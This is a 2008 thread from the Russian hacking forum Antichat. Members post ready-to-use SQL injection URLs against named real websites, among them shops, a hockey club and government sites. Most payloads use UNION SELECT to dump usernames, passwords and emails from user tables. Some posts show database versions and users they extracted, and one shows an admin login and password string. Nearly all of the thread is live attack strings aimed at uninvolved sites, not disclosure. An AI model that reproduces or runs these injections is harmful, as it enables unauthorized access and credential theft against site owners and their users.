Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
25.03.2008, 14:36
|
|
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
Провел на форуме:
253346
Репутация:
146
|
|
Код:
http://www.dubus.by/modules/photo/viewcat.php?id=1015&cid=-99999/**/union/**/select/**/0,pass/**/from/**/runcms_users/*
Код:
http://www.poisk.slonim.org/modules/bamagalerie3/viewcat.php?id=31&cid=-99999/**/union/**/select/**/0,pass/**/from/**/runcms_users/*
Код:
http://emaximum.ru/modules/bamagalerie3/viewcat.php?id=82&cid=-99999/**/union/**/select/**/0,pass/**/from/**/runcms_users/*
Код:
http://www.megafizz.com/modules/bamagalerie3/viewcat.php?id=175&cid=-99999/**/union/**/select/**/0,pass/**/from/**/runcms_users/*
Код:
http://www.karadag.com.ua/modules/bamagalerie3/viewcat.php?id=96&cid=-99999/**/union/**/select/**/0,pass/**/from/**/runcms_users/*
Код:
http://www.cobra-tattoo.net/modules/photo/viewcat.php?id=14&cid=-99999/**/union/**/select/**/0,pass/**/from/**/runcms_users/*
Последний раз редактировалось bag; 25.03.2008 в 22:34..
|
|
|
26.03.2008, 14:09
|
|
Познающий
Регистрация: 15.09.2005
Сообщений: 60
Провел на форуме:
254802
Репутация:
52
|
|
SyBase
Код:
http://www.planetashop.ru/index.php?content=info&f_name=news_description&news_id=-1+union+select+@@version,2,3
|
|
|
|
26.03.2008, 17:46
|
|
Новичок
Регистрация: 19.09.2007
Сообщений: 12
Провел на форуме:
324160
Репутация:
19
|
|
Дата: 24.03.2008
http://www.xakep.ru/post/42921/default.asp
Хакеры взломали веб-сайт новосибирского хоккейного клуба «Сибирь». С ресурса были удалены все данные.
Я решил поискать на сайтах других команд Российской суппер лиги и нашел инъекцию на сайте "Уфимского Салавата". Таблица с зарегестрированными, почти, 4к юзерами ... Правда попасть в админку мне не удалось, зато можно зайти на сайт под админом.
http://www.hcsalavat.ru/?show=1696%20and%200%20union%20select%201,2,concat _ws(0x3a,nick,pass,email),4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20%20from%20users%20limit%203965 ,1--
|
|
|
|
27.03.2008, 01:05
|
|
Познающий
Регистрация: 26.03.2008
Сообщений: 31
Провел на форуме:
208349
Репутация:
82
|
|
мoи первые sql-injection, я только учусь, прочитала статьи)))
http://www.globalfriendship.us/newsdetail.php?news_id=-4+union+select+1,table_name,3,4+from+information_s chema.tables
http://www.jeanbaptiste.us/page.php?news_id=-6+union+select+1,version(),3,4,5,6
|
|
|
|
27.03.2008, 01:34
|
|
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
Провел на форуме:
253346
Репутация:
146
|
|
еще свежачек
Код:
http://ural-audit.info/index.php?option=com_alphacontent§ion=5&cat=17&task=view&id=-999999/**/union/**/select/**/1,concat(username,0x3e,password),3,4,user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),39/**/from/**/jos_users/*
http://mp4club.ru/index.php?option=com_alphacontent§ion=4&cat=21&task=view&id=-999999/**/union/**/select/**/1,concat(username,0x3e,password),3,4,user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),39/**/from/**/jos_users/*
http://www.eurotula.ru/index.php?option=com_alphacontent§ion=11&cat=75&task=view&id=-999999/**/union/**/select/**/1,concat(username,0x3e,password),3,4,user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),39/**/from/**/jos_users/*
http://www.btlyar.ru/index.php?option=com_alphacontent§ion=1&cat=2&task=view&id=-999999/**/union/**/select/**/1,concat(username,0x3e,password),3,4,user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),39/**/from/**/jos_users/*
http://www.napoliaffari.com/napoliaffari/index.php?option=com_alphacontent§ion=8&cat=136&task=view&id=-999999/**/union/**/select/**/1,concat(username,0x3e,password),3,4,user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),39/**/from/**/jos_users/*
http://www.tribunjabar.co.id/post/postView.php?id=99999999999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10/*
http://www.moest.gov.np/postview.php?id=99999999999/**/UNION/**/SELECT/**/1,2,3,4/*
http://www.nepalgov.gov.np/postview.php?id=99999999/**/UNION/**/SELECT/**/1,2,3,4/
в падлу оформлять) |
|
|
|
27.03.2008, 09:45
|
|
Постоянный
Регистрация: 22.03.2008
Сообщений: 325
Провел на форуме:
1208132
Репутация:
63
|
|
Сообщение от bobob
Старгейт от Мэтров
http://stargate.mgm.c0m/news_detail.php?series=1999999999+union+select+1,c oncat_ws(0x3a,table_schema,table_name),3,4,5,6,7,8 ,9+from+information_schema.tables/*
Извините ,но почему все смотрят сначала в information_schema.tables,а потом в ...columns... .Ведь во втором случае содержиться и то и другое(извините если что не так)
http://stargate.mgm.c0m/news_detail.php?series=1999999999+union+select+1,c oncat_ws(0x2A,table_schema,table_name,column_name) ,3,4,5,6,7,8,9+from+information_schema.columns/*
|
|
|
|
27.03.2008, 11:31
|
|
Новичок
Регистрация: 09.11.2007
Сообщений: 8
Провел на форуме:
37581
Репутация:
15
|
|
http://www.dressout.ru/novosty/?n=-10%20union%20select%201,2,3,4,5,6/*&subaction=detail
Вывод ошибок отключен, дальше не получается че то раскрутить..
|
|
|
|
27.03.2008, 13:47
|
|
Новичок
Регистрация: 19.09.2007
Сообщений: 12
Провел на форуме:
324160
Репутация:
19
|
|
http://www.cifracenter.ru/tovar.php?ID=2926%20and%200%20union%20select%201,2 ,concat_ws(0x3a,name,password),4,5,6,7,8,9,10,11%2 0from%20u42265.auth--
http://www.advocat-office.ru/index.php?cp=6%20and%200%20union%20select%201,2,3, 4,5,6,concat_ws(0x3a,login,password,email,version( )),8,9,10%20from%20users%20limit%203,1--
http://slovari.299.ru/word.php?id=34807%20and%200%20union%20select%20con cat_ws(0x3a,password,email),null+from+u7138.User%2 0limit%200,1--
|
|
|
|
27.03.2008, 14:00
|
|
Новичок
Регистрация: 11.12.2007
Сообщений: 6
Провел на форуме:
162349
Репутация:
14
|
|
http://www.dako.ua/rus/novelties/?nid=-9999999999999+UNION+SELECT+1,2,3/*
user: dakosql@lo
database: dako
version: 4.0.13
http://hard.nov.ru/brands/A4-Tech/?id_new=-30+UNION+SELECT+1,2,3,4,5,6/*
user: root@localhost
database: hard
version: 5.0.22-log
http://sexshop-online.ru/index.php?part=6+UNION+SELECT+1,2,3,4,5,6,7,8,9,10 ,11,12,13/*
user: u91227@10.10.227.60c
database: u91227
version: 5.0.45-log
Последний раз редактировалось Lamersha; 27.03.2008 в 15:37..
|
|
|
|
27.03.2008, 19:33
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
_http://www.apt-rent.ru/catalog.php?view=-1+UNION+SELECT+1,2,table_name,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25+FROM+infor mation_schema.tables+LIMIT+ 16,1/*
От 16 и дальше имена таблиц 
Одмин mi3d:ueLAIzNPZE
Последний раз редактировалось Ponchik; 27.03.2008 в 19:36..
|
|
|
|
|
|
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Линейный вид
